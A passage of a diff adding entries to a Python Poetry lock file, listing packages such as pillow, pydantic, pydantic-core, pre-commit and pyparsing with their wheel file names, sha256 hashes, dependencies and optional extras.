+ {file = "pillow-10.4.0-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:0ae24a547e8b711ccaaf99c9ae3cd975470e1a30caa80a6aaee9a2f19c05701d"},
+ {file = "pillow-10.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:298478fe4f77a4408895605f3482b6cc6222c018b2ce565c2b6b9c354ac3229b"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:134ace6dc392116566980ee7436477d844520a26a4b1bd4053f6f47d096997fd"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:930044bb7679ab003b14023138b50181899da3f25de50e9dbee23b61b4de2126"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:c76e5786951e72ed3686e122d14c5d7012f16c8303a674d18cdcd6d89557fc5b"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:b2724fdb354a868ddf9a880cb84d102da914e99119211ef7ecbdc613b8c96b3c"},
+ {file = "pillow-10.4.0-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:dbc6ae66518ab3c5847659e9988c3b60dc94ffb48ef9168656e0019a93dbf8a1"},
+ {file = "pillow-10.4.0-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:06b2f7898047ae93fad74467ec3d28fe84f7831370e3c258afa533f81ef7f3df"},
+ {file = "pillow-10.4.0-cp39-cp39-win32.whl", hash = "sha256:7970285ab628a3779aecc35823296a7869f889b8329c16ad5a71e4901a3dc4ef"},
+ {file = "pillow-10.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:961a7293b2457b405967af9c77dcaa43cc1a8cd50d23c532e62d48ab6cdd56f5"},
+ {file = "pillow-10.4.0-cp39-cp39-win_arm64.whl", hash = "sha256:32cda9e3d601a52baccb2856b8ea1fc213c90b340c542dcef77140dfa3278a9e"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-macosx_10_15_x86_64.whl", hash = "sha256:5b4815f2e65b30f5fbae9dfffa8636d992d49705723fe86a3661806e069352d4"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:8f0aef4ef59694b12cadee839e2ba6afeab89c0f39a3adc02ed51d109117b8da"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f4727572e2918acaa9077c919cbbeb73bd2b3ebcfe033b72f858fc9fbef0026"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ff25afb18123cea58a591ea0244b92eb1e61a1fd497bf6d6384f09bc3262ec3e"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:dc3e2db6ba09ffd7d02ae9141cfa0ae23393ee7687248d46a7507b75d610f4f5"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:02a2be69f9c9b8c1e97cf2713e789d4e398c751ecfd9967c18d0ce304efbf885"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:0755ffd4a0c6f267cccbae2e9903d95477ca2f77c4fcf3a3a09570001856c8a5"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-macosx_10_15_x86_64.whl", hash = "sha256:a02364621fe369e06200d4a16558e056fe2805d3468350df3aef21e00d26214b"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:1b5dea9831a90e9d0721ec417a80d4cbd7022093ac38a568db2dd78363b00908"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9b885f89040bb8c4a1573566bbb2f44f5c505ef6e74cec7ab9068c900047f04b"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:87dd88ded2e6d74d31e1e0a99a726a6765cda32d00ba72dc37f0651f306daaa8"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:2db98790afc70118bd0255c2eeb465e9767ecf1f3c25f9a1abb8ffc8cfd1fe0a"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:f7baece4ce06bade126fb84b8af1c33439a76d8a6fd818970215e0560ca28c27"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:cfdd747216947628af7b259d274771d84db2268ca062dd5faf373639d00113a3"},
+ {file = "pillow-10.4.0.tar.gz", hash = "sha256:166c1cd4d24309b30d61f79f4a9114b7b2313d7450912277855ff5dfd7cd4a06"},
+]
+
+[package.extras]
+docs = ["furo", "olefile", "sphinx (>=7.3)", "sphinx-copybutton", "sphinx-inline-tabs", "sphinxext-opengraph"]
+fpx = ["olefile"]
+mic = ["olefile"]
+tests = ["check-manifest", "coverage", "defusedxml", "markdown2", "olefile", "packaging", "pyroma", "pytest", "pytest-cov", "pytest-timeout"]
+typing = ["typing-extensions"]
+xmp = ["defusedxml"]
+
+[[package]]
+name = "platformdirs"
+version = "4.3.6"
+description = "A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "platformdirs-4.3.6-py3-none-any.whl", hash = "sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb"},
+ {file = "platformdirs-4.3.6.tar.gz", hash = "sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907"},
+]
+
+[package.extras]
+docs = ["furo (>=2024.8.6)", "proselint (>=0.14)", "sphinx (>=8.0.2)", "sphinx-autodoc-typehints (>=2.4)"]
+test = ["appdirs (==1.4.4)", "covdefaults (>=2.3)", "pytest (>=8.3.2)", "pytest-cov (>=5)", "pytest-mock (>=3.14)"]
+type = ["mypy (>=1.11.2)"]
+
+[[package]]
+name = "pluggy"
+version = "1.5.0"
+description = "plugin and hook calling mechanisms for python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pluggy-1.5.0-py3-none-any.whl", hash = "sha256:44e1ad92c8ca002de6377e165f3e0f1be63266ab4d554740532335b9d75ea669"},
+ {file = "pluggy-1.5.0.tar.gz", hash = "sha256:2cffa88e94fdc978c4c574f15f9e59b7f4201d439195c3715ca9e2486f1d0cf1"},
+]
+
+[package.extras]
+dev = ["pre-commit", "tox"]
+testing = ["pytest", "pytest-benchmark"]
+
+[[package]]
+name = "pre-commit"
+version = "3.5.0"
+description = "A framework for managing and maintaining multi-language pre-commit hooks."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pre_commit-3.5.0-py2.py3-none-any.whl", hash = "sha256:841dc9aef25daba9a0238cd27984041fa0467b4199fc4852e27950664919f660"},
+ {file = "pre_commit-3.5.0.tar.gz", hash = "sha256:5804465c675b659b0862f07907f96295d490822a450c4c40e747d0b1c6ebcb32"},
+]
+
+[package.dependencies]
+cfgv = ">=2.0.0"
+identify = ">=1.0.0"
+nodeenv = ">=0.11.1"
+pyyaml = ">=5.1"
+virtualenv = ">=20.10.0"
+
+[[package]]
+name = "pydantic"
+version = "2.10.4"
+description = "Data validation using Python type hints"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pydantic-2.10.4-py3-none-any.whl", hash = "sha256:597e135ea68be3a37552fb524bc7d0d66dcf93d395acd93a00682f1efcb8ee3d"},
+ {file = "pydantic-2.10.4.tar.gz", hash = "sha256:82f12e9723da6de4fe2ba888b5971157b3be7ad914267dea8f05f82b28254f06"},
+]
+
+[package.dependencies]
+annotated-types = ">=0.6.0"
+pydantic-core = "2.27.2"
+typing-extensions = ">=4.12.2"
+
+[package.extras]
+email = ["email-validator (>=2.0.0)"]
+timezone = ["tzdata"]
+
+[[package]]
+name = "pydantic-core"
+version = "2.27.2"
+description = "Core functionality for Pydantic validation and serialization"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pydantic_core-2.27.2-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:2d367ca20b2f14095a8f4fa1210f5a7b78b8a20009ecced6b12818f455b1e9fa"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:491a2b73db93fab69731eaee494f320faa4e093dbed776be1a829c2eb222c34c"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7969e133a6f183be60e9f6f56bfae753585680f3b7307a8e555a948d443cc05a"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:3de9961f2a346257caf0aa508a4da705467f53778e9ef6fe744c038119737ef5"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e2bb4d3e5873c37bb3dd58714d4cd0b0e6238cebc4177ac8fe878f8b3aa8e74c"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:280d219beebb0752699480fe8f1dc61ab6615c2046d76b7ab7ee38858de0a4e7"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47956ae78b6422cbd46f772f1746799cbb862de838fd8d1fbd34a82e05b0983a"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:14d4a5c49d2f009d62a2a7140d3064f686d17a5d1a268bc641954ba181880236"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:337b443af21d488716f8d0b6164de833e788aa6bd7e3a39c005febc1284f4962"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_armv7l.whl", hash = "sha256:03d0f86ea3184a12f41a2d23f7ccb79cdb5a18e06993f8a45baa8dfec746f0e9"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:7041c36f5680c6e0f08d922aed302e98b3745d97fe1589db0a3eebf6624523af"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-win32.whl", hash = "sha256:50a68f3e3819077be2c98110c1f9dcb3817e93f267ba80a2c05bb4f8799e2ff4"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-win_amd64.whl", hash = "sha256:e0fd26b16394ead34a424eecf8a31a1f5137094cabe84a1bcb10fa6ba39d3d31"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:8e10c99ef58cfdf2a66fc15d66b16c4a04f62bca39db589ae8cba08bc55331bc"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:26f32e0adf166a84d0cb63be85c562ca8a6fa8de28e5f0d92250c6b7e9e2aff7"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8c19d1ea0673cd13cc2f872f6c9ab42acc4e4f492a7ca9d3795ce2b112dd7e15"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:5e68c4446fe0810e959cdff46ab0a41ce2f2c86d227d96dc3847af0ba7def306"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d9640b0059ff4f14d1f37321b94061c6db164fbe49b334b31643e0528d100d99"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:40d02e7d45c9f8af700f3452f329ead92da4c5f4317ca9b896de7ce7199ea459"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1c1fd185014191700554795c99b347d64f2bb637966c4cfc16998a0ca700d048"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d81d2068e1c1228a565af076598f9e7451712700b673de8f502f0334f281387d"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:1a4207639fb02ec2dbb76227d7c751a20b1a6b4bc52850568e52260cae64ca3b"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_armv7l.whl", hash = "sha256:3de3ce3c9ddc8bbd88f6e0e304dea0e66d843ec9de1b0042b0911c1663ffd474"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:30c5f68ded0c36466acede341551106821043e9afaad516adfb6e8fa80a4e6a6"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win32.whl", hash = "sha256:c70c26d2c99f78b125a3459f8afe1aed4d9687c24fd677c6a4436bc042e50d6c"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win_amd64.whl", hash = "sha256:08e125dbdc505fa69ca7d9c499639ab6407cfa909214d500897d02afb816e7cc"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-win_arm64.whl", hash = "sha256:26f0d68d4b235a2bae0c3fc585c585b4ecc51382db0e3ba402a22cbc440915e4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:9e0c8cfefa0ef83b4da9588448b6d8d2a2bf1a53c3f1ae5fca39eb3061e2f0b0"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:83097677b8e3bd7eaa6775720ec8e0405f1575015a463285a92bfdfe254529ef"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:172fce187655fece0c90d90a678424b013f8fbb0ca8b036ac266749c09438cb7"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:519f29f5213271eeeeb3093f662ba2fd512b91c5f188f3bb7b27bc5973816934"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:05e3a55d124407fffba0dd6b0c0cd056d10e983ceb4e5dbd10dda135c31071d6"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9c3ed807c7b91de05e63930188f19e921d1fe90de6b4f5cd43ee7fcc3525cb8c"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6fb4aadc0b9a0c063206846d603b92030eb6f03069151a625667f982887153e2"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:28ccb213807e037460326424ceb8b5245acb88f32f3d2777427476e1b32c48c4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:de3cd1899e2c279b140adde9357c4495ed9d47131b4a4eaff9052f23398076b3"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_armv7l.whl", hash = "sha256:220f892729375e2d736b97d0e51466252ad84c51857d4d15f5e9692f9ef12be4"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:a0fcd29cd6b4e74fe8ddd2c90330fd8edf2e30cb52acda47f06dd615ae72da57"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win32.whl", hash = "sha256:1e2cb691ed9834cd6a8be61228471d0a503731abfb42f82458ff27be7b2186fc"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win_amd64.whl", hash = "sha256:cc3f1a99a4f4f9dd1de4fe0312c114e740b5ddead65bb4102884b384c15d8bc9"},
+ {file = "pydantic_core-2.27.2-cp312-cp312-win_arm64.whl", hash = "sha256:3911ac9284cd8a1792d3cb26a2da18f3ca26c6908cc434a18f730dc0db7bfa3b"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-macosx_10_12_x86_64.whl", hash = "sha256:7d14bd329640e63852364c306f4d23eb744e0f8193148d4044dd3dacdaacbd8b"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:82f91663004eb8ed30ff478d77c4d1179b3563df6cdb15c0817cd1cdaf34d154"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:71b24c7d61131bb83df10cc7e687433609963a944ccf45190cfc21e0887b08c9"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:fa8e459d4954f608fa26116118bb67f56b93b209c39b008277ace29937453dc9"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ce8918cbebc8da707ba805b7fd0b382816858728ae7fe19a942080c24e5b7cd1"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:eda3f5c2a021bbc5d976107bb302e0131351c2ba54343f8a496dc8783d3d3a6a"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bd8086fa684c4775c27f03f062cbb9eaa6e17f064307e86b21b9e0abc9c0f02e"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:8d9b3388db186ba0c099a6d20f0604a44eabdeef1777ddd94786cdae158729e4"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:7a66efda2387de898c8f38c0cf7f14fca0b51a8ef0b24bfea5849f1b3c95af27"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_armv7l.whl", hash = "sha256:18a101c168e4e092ab40dbc2503bdc0f62010e95d292b27827871dc85450d7ee"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:ba5dd002f88b78a4215ed2f8ddbdf85e8513382820ba15ad5ad8955ce0ca19a1"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win32.whl", hash = "sha256:1ebaf1d0481914d004a573394f4be3a7616334be70261007e47c2a6fe7e50130"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win_amd64.whl", hash = "sha256:953101387ecf2f5652883208769a79e48db18c6df442568a0b5ccd8c2723abee"},
+ {file = "pydantic_core-2.27.2-cp313-cp313-win_arm64.whl", hash = "sha256:ac4dbfd1691affb8f48c2c13241a2e3b60ff23247cbcf981759c768b6633cf8b"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-macosx_10_12_x86_64.whl", hash = "sha256:d3e8d504bdd3f10835468f29008d72fc8359d95c9c415ce6e767203db6127506"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:521eb9b7f036c9b6187f0b47318ab0d7ca14bd87f776240b90b21c1f4f149320"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:85210c4d99a0114f5a9481b44560d7d1e35e32cc5634c656bc48e590b669b145"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:d716e2e30c6f140d7560ef1538953a5cd1a87264c737643d481f2779fc247fe1"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f66d89ba397d92f840f8654756196d93804278457b5fbede59598a1f9f90b228"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:669e193c1c576a58f132e3158f9dfa9662969edb1a250c54d8fa52590045f046"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9fdbe7629b996647b99c01b37f11170a57ae675375b14b8c13b8518b8320ced5"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d262606bf386a5ba0b0af3b97f37c83d7011439e3dc1a9298f21efb292e42f1a"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:cabb9bcb7e0d97f74df8646f34fc76fbf793b7f6dc2438517d7a9e50eee4f14d"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_armv7l.whl", hash = "sha256:d2d63f1215638d28221f664596b1ccb3944f6e25dd18cd3b86b0a4c408d5ebb9"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:bca101c00bff0adb45a833f8451b9105d9df18accb8743b08107d7ada14bd7da"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-win32.whl", hash = "sha256:f6f8e111843bbb0dee4cb6594cdc73e79b3329b526037ec242a3e49012495b3b"},
+ {file = "pydantic_core-2.27.2-cp38-cp38-win_amd64.whl", hash = "sha256:fd1aea04935a508f62e0d0ef1f5ae968774a32afc306fb8545e06f5ff5cdf3ad"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-macosx_10_12_x86_64.whl", hash = "sha256:c10eb4f1659290b523af58fa7cffb452a61ad6ae5613404519aee4bfbf1df993"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ef592d4bad47296fb11f96cd7dc898b92e795032b4894dfb4076cfccd43a9308"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c61709a844acc6bf0b7dce7daae75195a10aac96a596ea1b776996414791ede4"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:42c5f762659e47fdb7b16956c71598292f60a03aa92f8b6351504359dbdba6cf"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4c9775e339e42e79ec99c441d9730fccf07414af63eac2f0e48e08fd38a64d76"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:57762139821c31847cfb2df63c12f725788bd9f04bc2fb392790959b8f70f118"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0d1e85068e818c73e048fe28cfc769040bb1f475524f4745a5dc621f75ac7630"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:097830ed52fd9e427942ff3b9bc17fab52913b2f50f2880dc4a5611446606a54"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:044a50963a614ecfae59bb1eaf7ea7efc4bc62f49ed594e18fa1e5d953c40e9f"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_armv7l.whl", hash = "sha256:4e0b4220ba5b40d727c7f879eac379b822eee5d8fff418e9d3381ee45b3b0362"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5e4f4bb20d75e9325cc9696c6802657b58bc1dbbe3022f32cc2b2b632c3fbb96"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-win32.whl", hash = "sha256:cca63613e90d001b9f2f9a9ceb276c308bfa2a43fafb75c8031c4f66039e8c6e"},
+ {file = "pydantic_core-2.27.2-cp39-cp39-win_amd64.whl", hash = "sha256:77d1bca19b0f7021b3a982e6f903dcd5b2b06076def36a652e3907f596e29f67"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:2bf14caea37e91198329b828eae1618c068dfb8ef17bb33287a7ad4b61ac314e"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:b0cb791f5b45307caae8810c2023a184c74605ec3bcbb67d13846c28ff731ff8"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:688d3fd9fcb71f41c4c015c023d12a79d1c4c0732ec9eb35d96e3388a120dcf3"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d591580c34f4d731592f0e9fe40f9cc1b430d297eecc70b962e93c5c668f15f"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:82f986faf4e644ffc189a7f1aafc86e46ef70372bb153e7001e8afccc6e54133"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:bec317a27290e2537f922639cafd54990551725fc844249e64c523301d0822fc"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_armv7l.whl", hash = "sha256:0296abcb83a797db256b773f45773da397da75a08f5fcaef41f2044adec05f50"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:0d75070718e369e452075a6017fbf187f788e17ed67a3abd47fa934d001863d9"},
+ {file = "pydantic_core-2.27.2-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:7e17b560be3c98a8e3aa66ce828bdebb9e9ac6ad5466fba92eb74c4c95cb1151"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c33939a82924da9ed65dab5a65d427205a73181d8098e79b6b426bdf8ad4e656"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:00bad2484fa6bda1e216e7345a798bd37c68fb2d97558edd584942aa41b7d278"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c817e2b40aba42bac6f457498dacabc568c3b7a986fc9ba7c8d9d260b71485fb"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:251136cdad0cb722e93732cb45ca5299fb56e1344a833640bf93b2803f8d1bfd"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d2088237af596f0a524d3afc39ab3b036e8adb054ee57cbb1dcf8e09da5b29cc"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:d4041c0b966a84b4ae7a09832eb691a35aec90910cd2dbe7a208de59be77965b"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_armv7l.whl", hash = "sha256:8083d4e875ebe0b864ffef72a4304827015cff328a1be6e22cc850753bfb122b"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:f141ee28a0ad2123b6611b6ceff018039df17f32ada8b534e6aa039545a3efb2"},
+ {file = "pydantic_core-2.27.2-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:7d0c8399fcc1848491f00e0314bd59fb34a9c008761bcb422a057670c3f65e35"},
+ {file = "pydantic_core-2.27.2.tar.gz", hash = "sha256:eb026e5a4c1fee05726072337ff51d1efb6f59090b7da90d30ea58625b1ffb39"},
+]
+
+[package.dependencies]
+typing-extensions = ">=4.6.0,<4.7.0 || >4.7.0"
+
+[[package]]
+name = "pymdown-extensions"
+version = "10.13"
+description = "Extension pack for Python Markdown."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pymdown_extensions-10.13-py3-none-any.whl", hash = "sha256:80bc33d715eec68e683e04298946d47d78c7739e79d808203df278ee8ef89428"},
+ {file = "pymdown_extensions-10.13.tar.gz", hash = "sha256:e0b351494dc0d8d14a1f52b39b1499a00ef1566b4ba23dc74f1eba75c736f5dd"},
+]
+
+[package.dependencies]
+markdown = ">=3.6"
+pyyaml = "*"
+
+[package.extras]
+extra = ["pygments (>=2.12)"]
+
+[[package]]
+name = "pyparsing"
+version = "3.1.4"
+description = "pyparsing module - Classes and methods to define and execute parsing grammars"
+optional = false
+python-versions = ">=3.6.8"
+files = [
+ {file = "pyparsing-3.1.4-py3-none-any.whl", hash = "sha256:a6a7ee4235a3f944aa1fa2249307708f893fe5717dc603503c6c7969c070fb7c"},
+ {file = "pyparsing-3.1.4.tar.gz", hash = "sha256:f86ec8d1a83f11977c9a6ea7598e8c27fc5cddfa5b07ea2241edbbde1d7bc032"},
+]
+
+[package.extras]
+diagrams = ["jinja2", "railroad-diagrams"]
+
+[[package]]
+name = "pytest"
+version = "7.4.4"
+description = "pytest: simple powerful testing with Python"
+optional = false
+python-versions = ">=3.7"
+files = [
